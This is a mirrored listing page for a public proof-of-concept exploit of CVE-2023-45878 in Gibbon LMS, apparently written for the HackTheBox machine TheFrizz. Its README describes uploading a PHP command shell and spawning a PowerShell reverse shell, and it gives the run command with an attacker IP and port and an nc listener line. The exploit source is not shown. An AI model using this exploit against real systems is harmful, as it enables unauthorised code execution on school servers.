Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2023-45878 PoC — Gibbon 安全漏洞

Source
https://github.com/dgoorden/CVE-2023-45878
Associated Vulnerability
Title:Gibbon 安全漏洞 (CVE-2023-45878)
Description:Gibbon是一个解决教育工作者每天遇到的实际问题的学校平台。 GibbonEdu Gibbon 25.0.1版本存在安全漏洞,该漏洞源于允许未经身份验证的攻击者将任意文件上传到应用程序,并在底层系统上执行代码。
Readme
# CVE-2023-45878

Wrote this script based on the work of https://herolab.usd.de/security-advisories/usd-2023-0025/ . The exploit works by using an Arbitrary File Write exploit in Gibbon LMS 25.0.1 . This PoC will use upload a simple php cmd script, and then use that to load a powershell revshell.

```Example
python3 CVE-2023-45878.py -u http://frizzdc.frizz.htb/Gibbon-LMS -l 10.10.16.2 -p 8888 -f asdf
```

Flags:
```
-u, URL where Gibbon LMS is installed.
-l, your IP
-p, your open port
-f, filename. Important if you need to manually test. Default is "asdf".
```

Have a listener ready for the incoming shell.

```
nc -lvnp 8888
```

This was used for TheFrizz on HTB, submitted by 0xPizzaCat.
File Snapshot

 [4.0K]  /data/pocs/28639c2b0241bff1b5434af3948a130cf92cdd46
├── [5.1K]  CVE-2023-45878.py
└── [ 699]  README.md

0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.